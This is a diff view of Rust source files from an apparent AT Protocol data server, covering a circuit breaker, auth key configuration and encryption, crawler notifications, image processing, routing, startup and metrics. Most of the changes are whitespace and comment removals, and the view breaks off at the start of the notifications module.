src/circuit_breaker.rs
···
2
2
use std::sync::Arc;
3
3
use std::time::Duration;
4
4
use tokio::sync::RwLock;
5
+
5
6
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
6
7
pub enum CircuitState {
7
8
Closed,
8
9
Open,
9
10
HalfOpen,
10
11
}
12
+
11
13
pub struct CircuitBreaker {
12
14
name: String,
13
15
failure_threshold: u32,
···
18
20
success_count: AtomicU32,
19
21
last_failure_time: AtomicU64,
20
22
}
23
+
21
24
impl CircuitBreaker {
22
25
pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self {
23
26
Self {
···
31
34
last_failure_time: AtomicU64::new(0),
32
35
}
33
36
}
37
+
34
38
pub async fn can_execute(&self) -> bool {
35
39
let state = self.state.read().await;
40
+
36
41
match *state {
37
42
CircuitState::Closed => true,
38
43
CircuitState::Open => {
···
41
46
.duration_since(std::time::UNIX_EPOCH)
42
47
.unwrap()
43
48
.as_secs();
49
+
44
50
if now - last_failure >= self.timeout.as_secs() {
45
51
drop(state);
46
52
let mut state = self.state.write().await;
···
56
62
CircuitState::HalfOpen => true,
57
63
}
58
64
}
65
+
59
66
pub async fn record_success(&self) {
60
67
let state = *self.state.read().await;
68
+
61
69
match state {
62
70
CircuitState::Closed => {
63
71
self.failure_count.store(0, Ordering::SeqCst);
···
75
83
CircuitState::Open => {}
76
84
}
77
85
}
86
+
78
87
pub async fn record_failure(&self) {
79
88
let state = *self.state.read().await;
89
+
80
90
match state {
81
91
CircuitState::Closed => {
82
92
let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1;
···
110
120
CircuitState::Open => {}
111
121
}
112
122
}
123
+
113
124
pub async fn state(&self) -> CircuitState {
114
125
*self.state.read().await
115
126
}
127
+
116
128
pub fn name(&self) -> &str {
117
129
&self.name
118
130
}
119
131
}
132
+
120
133
#[derive(Clone)]
121
134
pub struct CircuitBreakers {
122
135
pub plc_directory: Arc<CircuitBreaker>,
123
136
pub relay_notification: Arc<CircuitBreaker>,
124
137
}
138
+
125
139
impl Default for CircuitBreakers {
126
140
fn default() -> Self {
127
141
Self::new()
128
142
}
129
143
}
144
+
130
145
impl CircuitBreakers {
131
146
pub fn new() -> Self {
132
147
Self {
···
135
150
}
136
151
}
137
152
}
153
+
138
154
#[derive(Debug)]
139
155
pub struct CircuitOpenError {
140
156
pub circuit_name: String,
141
157
}
158
+
142
159
impl std::fmt::Display for CircuitOpenError {
143
160
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
144
161
write!(f, "Circuit breaker '{}' is open", self.circuit_name)
145
162
}
146
163
}
164
+
147
165
impl std::error::Error for CircuitOpenError {}
166
+
148
167
pub async fn with_circuit_breaker<T, E, F, Fut>(
149
168
circuit: &CircuitBreaker,
150
169
operation: F,
···
158
177
circuit_name: circuit.name().to_string(),
159
178
}));
160
179
}
180
+
161
181
match operation().await {
162
182
Ok(result) => {
163
183
circuit.record_success().await;
···
169
189
}
170
190
}
171
191
}
192
+
172
193
#[derive(Debug)]
173
194
pub enum CircuitBreakerError<E> {
174
195
CircuitOpen(CircuitOpenError),
175
196
OperationFailed(E),
176
197
}
198
+
177
199
impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> {
178
200
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
179
201
match self {
···
182
204
}
183
205
}
184
206
}
207
+
185
208
impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> {
186
209
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
187
210
match self {
···
190
213
}
191
214
}
192
215
}
216
+
193
217
#[cfg(test)]
194
218
mod tests {
195
219
use super::*;
220
+
196
221
#[tokio::test]
197
222
async fn test_circuit_breaker_starts_closed() {
198
223
let cb = CircuitBreaker::new("test", 3, 2, 10);
199
224
assert_eq!(cb.state().await, CircuitState::Closed);
200
225
assert!(cb.can_execute().await);
201
226
}
227
+
202
228
#[tokio::test]
203
229
async fn test_circuit_breaker_opens_after_failures() {
204
230
let cb = CircuitBreaker::new("test", 3, 2, 10);
231
+
205
232
cb.record_failure().await;
206
233
assert_eq!(cb.state().await, CircuitState::Closed);
234
+
207
235
cb.record_failure().await;
208
236
assert_eq!(cb.state().await, CircuitState::Closed);
237
+
209
238
cb.record_failure().await;
210
239
assert_eq!(cb.state().await, CircuitState::Open);
211
240
assert!(!cb.can_execute().await);
212
241
}
242
+
213
243
#[tokio::test]
214
244
async fn test_circuit_breaker_success_resets_failures() {
215
245
let cb = CircuitBreaker::new("test", 3, 2, 10);
246
+
216
247
cb.record_failure().await;
217
248
cb.record_failure().await;
218
249
cb.record_success().await;
250
+
219
251
cb.record_failure().await;
220
252
cb.record_failure().await;
221
253
assert_eq!(cb.state().await, CircuitState::Closed);
254
+
222
255
cb.record_failure().await;
223
256
assert_eq!(cb.state().await, CircuitState::Open);
224
257
}
258
+
225
259
#[tokio::test]
226
260
async fn test_circuit_breaker_half_open_closes_after_successes() {
227
261
let cb = CircuitBreaker::new("test", 3, 2, 0);
262
+
228
263
for _ in 0..3 {
229
264
cb.record_failure().await;
230
265
}
231
266
assert_eq!(cb.state().await, CircuitState::Open);
267
+
232
268
tokio::time::sleep(Duration::from_millis(100)).await;
233
269
assert!(cb.can_execute().await);
234
270
assert_eq!(cb.state().await, CircuitState::HalfOpen);
271
+
235
272
cb.record_success().await;
236
273
assert_eq!(cb.state().await, CircuitState::HalfOpen);
274
+
237
275
cb.record_success().await;
238
276
assert_eq!(cb.state().await, CircuitState::Closed);
239
277
}
278
+
240
279
#[tokio::test]
241
280
async fn test_circuit_breaker_half_open_reopens_on_failure() {
242
281
let cb = CircuitBreaker::new("test", 3, 2, 0);
282
+
243
283
for _ in 0..3 {
244
284
cb.record_failure().await;
245
285
}
286
+
246
287
tokio::time::sleep(Duration::from_millis(100)).await;
247
288
cb.can_execute().await;
289
+
248
290
cb.record_failure().await;
249
291
assert_eq!(cb.state().await, CircuitState::Open);
250
292
}
293
+
251
294
#[tokio::test]
252
295
async fn test_with_circuit_breaker_helper() {
253
296
let cb = CircuitBreaker::new("test", 3, 2, 10);
297
+
254
298
let result: Result<i32, CircuitBreakerError<std::io::Error>> =
255
299
with_circuit_breaker(&cb, || async { Ok(42) }).await;
256
300
assert!(result.is_ok());
257
301
assert_eq!(result.unwrap(), 42);
302
+
258
303
let result: Result<i32, CircuitBreakerError<&str>> =
259
304
with_circuit_breaker(&cb, || async { Err("error") }).await;
260
305
assert!(result.is_err());
+32
src/config.rs
+32
src/config.rs
···
8
8
use p256::ecdsa::SigningKey;
9
9
use sha2::{Digest, Sha256};
10
10
use std::sync::OnceLock;
11
+
11
12
static CONFIG: OnceLock<AuthConfig> = OnceLock::new();
13
+
12
14
pub const ENCRYPTION_VERSION: i32 = 1;
15
+
13
16
pub struct AuthConfig {
14
17
jwt_secret: String,
15
18
dpop_secret: String,
···
20
23
pub signing_key_y: String,
21
24
key_encryption_key: [u8; 32],
22
25
}
26
+
23
27
impl AuthConfig {
24
28
pub fn init() -> &'static Self {
25
29
CONFIG.get_or_init(|| {
···
33
37
);
34
38
}
35
39
});
40
+
36
41
let dpop_secret = std::env::var("DPOP_SECRET").unwrap_or_else(|_| {
37
42
if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() {
38
43
"test-dpop-secret-not-for-production".to_string()
···
43
48
);
44
49
}
45
50
});
51
+
46
52
if jwt_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
47
53
panic!("JWT_SECRET must be at least 32 characters");
48
54
}
55
+
49
56
if dpop_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
50
57
panic!("DPOP_SECRET must be at least 32 characters");
51
58
}
59
+
52
60
let mut hasher = Sha256::new();
53
61
hasher.update(b"oauth-signing-key-derivation:");
54
62
hasher.update(jwt_secret.as_bytes());
55
63
let seed = hasher.finalize();
64
+
56
65
let signing_key = SigningKey::from_slice(&seed)
57
66
.unwrap_or_else(|e| panic!("Failed to create signing key from seed: {}. This is a bug.", e));
67
+
58
68
let verifying_key = signing_key.verifying_key();
59
69
let point = verifying_key.to_encoded_point(false);
70
+
60
71
let signing_key_x = URL_SAFE_NO_PAD.encode(
61
72
point.x().expect("EC point missing X coordinate - this should never happen")
62
73
);
63
74
let signing_key_y = URL_SAFE_NO_PAD.encode(
64
75
point.y().expect("EC point missing Y coordinate - this should never happen")
65
76
);
77
+
66
78
let mut kid_hasher = Sha256::new();
67
79
kid_hasher.update(signing_key_x.as_bytes());
68
80
kid_hasher.update(signing_key_y.as_bytes());
69
81
let kid_hash = kid_hasher.finalize();
70
82
let signing_key_id = URL_SAFE_NO_PAD.encode(&kid_hash[..8]);
83
+
71
84
let master_key = std::env::var("MASTER_KEY").unwrap_or_else(|_| {
72
85
if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() {
73
86
"test-master-key-not-for-production".to_string()
···
78
91
);
79
92
}
80
93
});
94
+
81
95
if master_key.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
82
96
panic!("MASTER_KEY must be at least 32 characters");
83
97
}
98
+
84
99
let hk = Hkdf::<Sha256>::new(None, master_key.as_bytes());
85
100
let mut key_encryption_key = [0u8; 32];
86
101
hk.expand(b"bspds-user-key-encryption", &mut key_encryption_key)
87
102
.expect("HKDF expansion failed");
103
+
88
104
AuthConfig {
89
105
jwt_secret,
90
106
dpop_secret,
···
96
112
}
97
113
})
98
114
}
115
+
99
116
pub fn get() -> &'static Self {
100
117
CONFIG.get().expect("AuthConfig not initialized - call AuthConfig::init() first")
101
118
}
119
+
102
120
pub fn jwt_secret(&self) -> &str {
103
121
&self.jwt_secret
104
122
}
123
+
105
124
pub fn dpop_secret(&self) -> &str {
106
125
&self.dpop_secret
107
126
}
127
+
108
128
pub fn encrypt_user_key(&self, plaintext: &[u8]) -> Result<Vec<u8>, String> {
109
129
use rand::RngCore;
130
+
110
131
let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key)
111
132
.map_err(|e| format!("Failed to create cipher: {}", e))?;
133
+
112
134
let mut nonce_bytes = [0u8; 12];
113
135
rand::thread_rng().fill_bytes(&mut nonce_bytes);
136
+
114
137
#[allow(deprecated)]
115
138
let nonce = Nonce::from_slice(&nonce_bytes);
139
+
116
140
let ciphertext = cipher
117
141
.encrypt(nonce, plaintext)
118
142
.map_err(|e| format!("Encryption failed: {}", e))?;
143
+
119
144
let mut result = Vec::with_capacity(12 + ciphertext.len());
120
145
result.extend_from_slice(&nonce_bytes);
121
146
result.extend_from_slice(&ciphertext);
147
+
122
148
Ok(result)
123
149
}
150
+
124
151
pub fn decrypt_user_key(&self, encrypted: &[u8]) -> Result<Vec<u8>, String> {
125
152
if encrypted.len() < 12 {
126
153
return Err("Encrypted data too short".to_string());
127
154
}
155
+
128
156
let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key)
129
157
.map_err(|e| format!("Failed to create cipher: {}", e))?;
158
+
130
159
#[allow(deprecated)]
131
160
let nonce = Nonce::from_slice(&encrypted[..12]);
132
161
let ciphertext = &encrypted[12..];
162
+
133
163
cipher
134
164
.decrypt(nonce, ciphertext)
135
165
.map_err(|e| format!("Decryption failed: {}", e))
136
166
}
137
167
}
168
+
138
169
pub fn encrypt_key(plaintext: &[u8]) -> Result<Vec<u8>, String> {
139
170
AuthConfig::get().encrypt_user_key(plaintext)
140
171
}
172
+
141
173
pub fn decrypt_key(encrypted: &[u8], version: Option<i32>) -> Result<Vec<u8>, String> {
142
174
match version.unwrap_or(0) {
143
175
0 => Ok(encrypted.to_vec()),
+19
src/crawlers.rs
+19
src/crawlers.rs
···
6
6
use std::time::Duration;
7
7
use tokio::sync::{broadcast, watch};
8
8
use tracing::{debug, error, info, warn};
9
+
9
10
const NOTIFY_THRESHOLD_SECS: u64 = 20 * 60;
11
+
10
12
pub struct Crawlers {
11
13
hostname: String,
12
14
crawler_urls: Vec<String>,
···
14
16
last_notified: AtomicU64,
15
17
circuit_breaker: Option<Arc<CircuitBreaker>>,
16
18
}
19
+
17
20
impl Crawlers {
18
21
pub fn new(hostname: String, crawler_urls: Vec<String>) -> Self {
19
22
Self {
···
27
30
circuit_breaker: None,
28
31
}
29
32
}
33
+
30
34
pub fn with_circuit_breaker(mut self, circuit_breaker: Arc<CircuitBreaker>) -> Self {
31
35
self.circuit_breaker = Some(circuit_breaker);
32
36
self
33
37
}
38
+
34
39
pub fn from_env() -> Option<Self> {
35
40
let hostname = std::env::var("PDS_HOSTNAME").ok()?;
41
+
36
42
let crawler_urls: Vec<String> = std::env::var("CRAWLERS")
37
43
.unwrap_or_default()
38
44
.split(',')
39
45
.filter(|s| !s.is_empty())
40
46
.map(|s| s.trim().to_string())
41
47
.collect();
48
+
42
49
if crawler_urls.is_empty() {
43
50
return None;
44
51
}
52
+
45
53
Some(Self::new(hostname, crawler_urls))
46
54
}
55
+
47
56
fn should_notify(&self) -> bool {
48
57
let now = std::time::SystemTime::now()
49
58
.duration_since(std::time::UNIX_EPOCH)
50
59
.unwrap_or_default()
51
60
.as_secs();
61
+
52
62
let last = self.last_notified.load(Ordering::Relaxed);
53
63
now - last >= NOTIFY_THRESHOLD_SECS
54
64
}
65
+
55
66
fn mark_notified(&self) {
56
67
let now = std::time::SystemTime::now()
57
68
.duration_since(std::time::UNIX_EPOCH)
58
69
.unwrap_or_default()
59
70
.as_secs();
71
+
60
72
self.last_notified.store(now, Ordering::Relaxed);
61
73
}
74
+
62
75
pub async fn notify_of_update(&self) {
63
76
if !self.should_notify() {
64
77
debug!("Skipping crawler notification due to debounce");
65
78
return;
66
79
}
80
+
67
81
if let Some(cb) = &self.circuit_breaker {
68
82
if !cb.can_execute().await {
69
83
debug!("Skipping crawler notification due to circuit breaker open");
70
84
return;
71
85
}
72
86
}
87
+
73
88
self.mark_notified();
74
89
let circuit_breaker = self.circuit_breaker.clone();
90
+
75
91
for crawler_url in &self.crawler_urls {
76
92
let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/'));
77
93
let hostname = self.hostname.clone();
78
94
let client = self.http_client.clone();
79
95
let cb = circuit_breaker.clone();
96
+
80
97
tokio::spawn(async move {
81
98
match client
82
99
.post(&url)
···
116
133
}
117
134
}
118
135
}
136
+
119
137
pub async fn start_crawlers_service(
120
138
crawlers: Arc<Crawlers>,
121
139
mut firehose_rx: broadcast::Receiver<SequencedEvent>,
···
127
145
crawlers = ?crawlers.crawler_urls,
128
146
"Starting crawlers notification service"
129
147
);
148
+
130
149
loop {
131
150
tokio::select! {
132
151
result = firehose_rx.recv() => {
+28
-1
src/image/mod.rs
+28
-1
src/image/mod.rs
···
1
1
use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType};
2
2
use std::io::Cursor;
3
+
3
4
pub const THUMB_SIZE_FEED: u32 = 200;
4
5
pub const THUMB_SIZE_FULL: u32 = 1000;
6
+
5
7
#[derive(Debug, Clone)]
6
8
pub struct ProcessedImage {
7
9
pub data: Vec<u8>,
···
9
11
pub width: u32,
10
12
pub height: u32,
11
13
}
14
+
12
15
#[derive(Debug, Clone)]
13
16
pub struct ImageProcessingResult {
14
17
pub original: ProcessedImage,
15
18
pub thumbnail_feed: Option<ProcessedImage>,
16
19
pub thumbnail_full: Option<ProcessedImage>,
17
20
}
21
+
18
22
#[derive(Debug, thiserror::Error)]
19
23
pub enum ImageError {
20
24
#[error("Failed to decode image: {0}")]
···
32
36
#[error("File too large: {size} bytes exceeds maximum {max_size} bytes")]
33
37
FileTooLarge { size: usize, max_size: usize },
34
38
}
35
-
pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024; // 10MB
39
+
40
+
pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024;
41
+
36
42
pub struct ImageProcessor {
37
43
max_dimension: u32,
38
44
max_file_size: usize,
39
45
output_format: OutputFormat,
40
46
generate_thumbnails: bool,
41
47
}
48
+
42
49
#[derive(Debug, Clone, Copy)]
43
50
pub enum OutputFormat {
44
51
WebP,
···
46
53
Png,
47
54
Original,
48
55
}
56
+
49
57
impl Default for ImageProcessor {
50
58
fn default() -> Self {
51
59
Self {
···
56
64
}
57
65
}
58
66
}
67
+
59
68
impl ImageProcessor {
60
69
pub fn new() -> Self {
61
70
Self::default()
62
71
}
72
+
63
73
pub fn with_max_dimension(mut self, max: u32) -> Self {
64
74
self.max_dimension = max;
65
75
self
66
76
}
77
+
67
78
pub fn with_max_file_size(mut self, max: usize) -> Self {
68
79
self.max_file_size = max;
69
80
self
70
81
}
82
+
71
83
pub fn with_output_format(mut self, format: OutputFormat) -> Self {
72
84
self.output_format = format;
73
85
self
74
86
}
87
+
75
88
pub fn with_thumbnails(mut self, generate: bool) -> Self {
76
89
self.generate_thumbnails = generate;
77
90
self
78
91
}
92
+
79
93
pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> {
80
94
if data.len() > self.max_file_size {
81
95
return Err(ImageError::FileTooLarge {
···
109
123
thumbnail_full,
110
124
})
111
125
}
126
+
112
127
fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> {
113
128
match mime_type.to_lowercase().as_str() {
114
129
"image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg),
···
124
139
}
125
140
}
126
141
}
142
+
127
143
fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> {
128
144
let cursor = Cursor::new(data);
129
145
let reader = ImageReader::with_format(cursor, format);
···
131
147
.decode()
132
148
.map_err(|e| ImageError::DecodeError(e.to_string()))
133
149
}
150
+
134
151
fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> {
135
152
let (data, mime_type) = match self.output_format {
136
153
OutputFormat::WebP => {
···
165
182
height: img.height(),
166
183
})
167
184
}
185
+
168
186
fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> {
169
187
let (orig_width, orig_height) = (img.width(), img.height());
170
188
let (new_width, new_height) = if orig_width > orig_height {
···
177
195
let thumb = img.resize(new_width, new_height, FilterType::Lanczos3);
178
196
self.encode_image(&thumb)
179
197
}
198
+
180
199
pub fn is_supported_mime_type(mime_type: &str) -> bool {
181
200
matches!(
182
201
mime_type.to_lowercase().as_str(),
183
202
"image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp"
184
203
)
185
204
}
205
+
186
206
pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> {
187
207
let format = image::guess_format(data)
188
208
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
···
196
216
Ok(buf)
197
217
}
198
218
}
219
+
199
220
#[cfg(test)]
200
221
mod tests {
201
222
use super::*;
223
+
202
224
fn create_test_image(width: u32, height: u32) -> Vec<u8> {
203
225
let img = DynamicImage::new_rgb8(width, height);
204
226
let mut buf = Vec::new();
205
227
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
206
228
buf
207
229
}
230
+
208
231
#[test]
209
232
fn test_process_small_image() {
210
233
let processor = ImageProcessor::new();
···
213
236
assert!(result.thumbnail_feed.is_none());
214
237
assert!(result.thumbnail_full.is_none());
215
238
}
239
+
216
240
#[test]
217
241
fn test_process_large_image_generates_thumbnails() {
218
242
let processor = ImageProcessor::new();
···
227
251
assert!(full_thumb.width <= THUMB_SIZE_FULL);
228
252
assert!(full_thumb.height <= THUMB_SIZE_FULL);
229
253
}
254
+
230
255
#[test]
231
256
fn test_webp_conversion() {
232
257
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
···
234
259
let result = processor.process(&data, "image/png").unwrap();
235
260
assert_eq!(result.original.mime_type, "image/webp");
236
261
}
262
+
237
263
#[test]
238
264
fn test_reject_too_large() {
239
265
let processor = ImageProcessor::new().with_max_dimension(1000);
···
241
267
let result = processor.process(&data, "image/png");
242
268
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
243
269
}
270
+
244
271
#[test]
245
272
fn test_is_supported_mime_type() {
246
273
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
+4
-1
src/lib.rs
+4
-1
src/lib.rs
···
16
16
pub mod sync;
17
17
pub mod util;
18
18
pub mod validation;
19
+
19
20
use axum::{
20
21
Router,
21
22
http::Method,
···
25
26
use state::AppState;
26
27
use tower_http::cors::{Any, CorsLayer};
27
28
use tower_http::services::{ServeDir, ServeFile};
29
+
28
30
pub fn app(state: AppState) -> Router {
29
31
let router = Router::new()
30
32
.route("/metrics", get(metrics::metrics_handler))
···
358
360
.route("/.well-known/did.json", get(api::identity::well_known_did))
359
361
.route("/.well-known/atproto-did", get(api::identity::well_known_atproto_did))
360
362
.route("/u/{handle}/did.json", get(api::identity::user_did_doc))
361
-
// OAuth 2.1 endpoints
362
363
.route(
363
364
"/.well-known/oauth-protected-resource",
364
365
get(oauth::endpoints::oauth_protected_resource),
···
402
403
.allow_headers(Any),
403
404
)
404
405
.with_state(state);
406
+
405
407
let frontend_dir = std::env::var("FRONTEND_DIR")
406
408
.unwrap_or_else(|_| "./frontend/dist".to_string());
409
+
407
410
if std::path::Path::new(&frontend_dir).join("index.html").exists() {
408
411
let index_path = format!("{}/index.html", frontend_dir);
409
412
let serve_dir = ServeDir::new(&frontend_dir)
+30
src/main.rs
+30
src/main.rs
···
6
6
use std::sync::Arc;
7
7
use tokio::sync::watch;
8
8
use tracing::{error, info, warn};
9
+
9
10
#[tokio::main]
10
11
async fn main() -> ExitCode {
11
12
dotenvy::dotenv().ok();
12
13
tracing_subscriber::fmt::init();
13
14
bspds::metrics::init_metrics();
15
+
14
16
match run().await {
15
17
Ok(()) => ExitCode::SUCCESS,
16
18
Err(e) => {
···
19
21
}
20
22
}
21
23
}
24
+
22
25
async fn run() -> Result<(), Box<dyn std::error::Error>> {
23
26
let database_url = std::env::var("DATABASE_URL")
24
27
.map_err(|_| "DATABASE_URL environment variable must be set")?;
28
+
25
29
let max_connections: u32 = std::env::var("DATABASE_MAX_CONNECTIONS")
26
30
.ok()
27
31
.and_then(|v| v.parse().ok())
28
32
.unwrap_or(100);
33
+
29
34
let min_connections: u32 = std::env::var("DATABASE_MIN_CONNECTIONS")
30
35
.ok()
31
36
.and_then(|v| v.parse().ok())
32
37
.unwrap_or(10);
38
+
33
39
let acquire_timeout_secs: u64 = std::env::var("DATABASE_ACQUIRE_TIMEOUT_SECS")
34
40
.ok()
35
41
.and_then(|v| v.parse().ok())
36
42
.unwrap_or(10);
43
+
37
44
info!(
38
45
"Configuring database pool: max={}, min={}, acquire_timeout={}s",
39
46
max_connections, min_connections, acquire_timeout_secs
40
47
);
48
+
41
49
let pool = sqlx::postgres::PgPoolOptions::new()
42
50
.max_connections(max_connections)
43
51
.min_connections(min_connections)
···
47
55
.connect(&database_url)
48
56
.await
49
57
.map_err(|e| format!("Failed to connect to Postgres: {}", e))?;
58
+
50
59
sqlx::migrate!("./migrations")
51
60
.run(&pool)
52
61
.await
53
62
.map_err(|e| format!("Failed to run migrations: {}", e))?;
63
+
54
64
let state = AppState::new(pool.clone()).await;
55
65
bspds::sync::listener::start_sequencer_listener(state.clone()).await;
66
+
56
67
let (shutdown_tx, shutdown_rx) = watch::channel(false);
68
+
57
69
let mut notification_service = NotificationService::new(pool);
70
+
58
71
if let Some(email_sender) = EmailSender::from_env() {
59
72
info!("Email notifications enabled");
60
73
notification_service = notification_service.register_sender(email_sender);
61
74
} else {
62
75
warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)");
63
76
}
77
+
64
78
if let Some(discord_sender) = DiscordSender::from_env() {
65
79
info!("Discord notifications enabled");
66
80
notification_service = notification_service.register_sender(discord_sender);
67
81
}
82
+
68
83
if let Some(telegram_sender) = TelegramSender::from_env() {
69
84
info!("Telegram notifications enabled");
70
85
notification_service = notification_service.register_sender(telegram_sender);
71
86
}
87
+
72
88
if let Some(signal_sender) = SignalSender::from_env() {
73
89
info!("Signal notifications enabled");
74
90
notification_service = notification_service.register_sender(signal_sender);
75
91
}
92
+
76
93
let notification_handle = tokio::spawn(notification_service.run(shutdown_rx.clone()));
94
+
77
95
let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() {
78
96
let crawlers = Arc::new(
79
97
crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone())
···
85
103
warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)");
86
104
None
87
105
};
106
+
88
107
let app = bspds::app(state);
89
108
let addr = SocketAddr::from(([127, 0, 0, 1], 3000));
90
109
info!("listening on {}", addr);
110
+
91
111
let listener = tokio::net::TcpListener::bind(addr)
92
112
.await
93
113
.map_err(|e| format!("Failed to bind to {}: {}", addr, e))?;
114
+
94
115
let server_result = axum::serve(listener, app)
95
116
.with_graceful_shutdown(shutdown_signal(shutdown_tx))
96
117
.await;
118
+
97
119
notification_handle.await.ok();
120
+
98
121
if let Some(handle) = crawlers_handle {
99
122
handle.await.ok();
100
123
}
124
+
101
125
if let Err(e) = server_result {
102
126
return Err(format!("Server error: {}", e).into());
103
127
}
128
+
104
129
Ok(())
105
130
}
131
+
106
132
async fn shutdown_signal(shutdown_tx: watch::Sender<bool>) {
107
133
let ctrl_c = async {
108
134
match tokio::signal::ctrl_c().await {
···
112
138
}
113
139
}
114
140
};
141
+
115
142
#[cfg(unix)]
116
143
let terminate = async {
117
144
match tokio::signal::unix::signal(tokio::signal::unix::SignalKind::terminate()) {
···
124
151
}
125
152
}
126
153
};
154
+
127
155
#[cfg(not(unix))]
128
156
let terminate = std::future::pending::<()>();
157
+
129
158
tokio::select! {
130
159
_ = ctrl_c => {},
131
160
_ = terminate => {},
132
161
}
162
+
133
163
info!("Shutdown signal received, stopping services...");
134
164
shutdown_tx.send(true).ok();
135
165
}
+28
src/metrics.rs
+28
src/metrics.rs
···
8
8
use metrics_exporter_prometheus::{PrometheusBuilder, PrometheusHandle};
9
9
use std::sync::OnceLock;
10
10
use std::time::Instant;
11
+
11
12
static PROMETHEUS_HANDLE: OnceLock<PrometheusHandle> = OnceLock::new();
13
+
12
14
pub fn init_metrics() -> PrometheusHandle {
13
15
let builder = PrometheusBuilder::new();
14
16
let handle = builder
15
17
.install_recorder()
16
18
.expect("failed to install Prometheus recorder");
19
+
17
20
PROMETHEUS_HANDLE.set(handle.clone()).ok();
18
21
describe_metrics();
22
+
19
23
handle
20
24
}
25
+
21
26
fn describe_metrics() {
22
27
metrics::describe_counter!(
23
28
"bspds_http_requests_total",
···
68
73
"Database query duration in seconds"
69
74
);
70
75
}
76
+
71
77
pub async fn metrics_handler() -> impl IntoResponse {
72
78
match PROMETHEUS_HANDLE.get() {
73
79
Some(handle) => {
···
81
87
),
82
88
}
83
89
}
90
+
84
91
pub async fn metrics_middleware(request: Request<Body>, next: Next) -> Response {
85
92
let start = Instant::now();
86
93
let method = request.method().to_string();
87
94
let path = normalize_path(request.uri().path());
95
+
88
96
let response = next.run(request).await;
97
+
89
98
let duration = start.elapsed().as_secs_f64();
90
99
let status = response.status().as_u16().to_string();
100
+
91
101
counter!(
92
102
"bspds_http_requests_total",
93
103
"method" => method.clone(),
···
95
105
"status" => status.clone()
96
106
)
97
107
.increment(1);
108
+
98
109
histogram!(
99
110
"bspds_http_request_duration_seconds",
100
111
"method" => method,
101
112
"path" => path
102
113
)
103
114
.record(duration);
115
+
104
116
response
105
117
}
118
+
106
119
fn normalize_path(path: &str) -> String {
107
120
if path.starts_with("/xrpc/") {
108
121
if let Some(method) = path.strip_prefix("/xrpc/") {
···
112
125
return path.to_string();
113
126
}
114
127
}
128
+
115
129
if path.starts_with("/u/") && path.ends_with("/did.json") {
116
130
return "/u/{handle}/did.json".to_string();
117
131
}
132
+
118
133
if path.starts_with("/oauth/") {
119
134
return path.to_string();
120
135
}
136
+
121
137
path.to_string()
122
138
}
139
+
123
140
pub fn record_auth_cache_hit(cache_type: &str) {
124
141
counter!("bspds_auth_cache_hits_total", "cache_type" => cache_type.to_string()).increment(1);
125
142
}
143
+
126
144
pub fn record_auth_cache_miss(cache_type: &str) {
127
145
counter!("bspds_auth_cache_misses_total", "cache_type" => cache_type.to_string()).increment(1);
128
146
}
147
+
129
148
pub fn set_firehose_subscribers(count: usize) {
130
149
gauge!("bspds_firehose_subscribers").set(count as f64);
131
150
}
151
+
132
152
pub fn increment_firehose_subscribers() {
133
153
counter!("bspds_firehose_events_total").increment(1);
134
154
}
155
+
135
156
pub fn record_firehose_event() {
136
157
counter!("bspds_firehose_events_total").increment(1);
137
158
}
159
+
138
160
pub fn record_block_operation(op_type: &str) {
139
161
counter!("bspds_block_operations_total", "op_type" => op_type.to_string()).increment(1);
140
162
}
163
+
141
164
pub fn record_s3_operation(op_type: &str, status: &str) {
142
165
counter!(
143
166
"bspds_s3_operations_total",
···
146
169
)
147
170
.increment(1);
148
171
}
172
+
149
173
pub fn set_notification_queue_size(size: usize) {
150
174
gauge!("bspds_notification_queue_size").set(size as f64);
151
175
}
176
+
152
177
pub fn record_rate_limit_rejection(limiter: &str) {
153
178
counter!("bspds_rate_limit_rejections_total", "limiter" => limiter.to_string()).increment(1);
154
179
}
180
+
155
181
pub fn record_db_query(query_type: &str, duration_seconds: f64) {
156
182
counter!("bspds_db_queries_total", "query_type" => query_type.to_string()).increment(1);
157
183
histogram!(
···
160
186
)
161
187
.record(duration_seconds);
162
188
}
189
+
163
190
#[cfg(test)]
164
191
mod tests {
165
192
use super::*;
193
+
166
194
#[test]
167
195
fn test_normalize_path() {
168
196
assert_eq!(
+3
src/notifications/mod.rs
+3
src/notifications/mod.rs
···
1
1
mod sender;
2
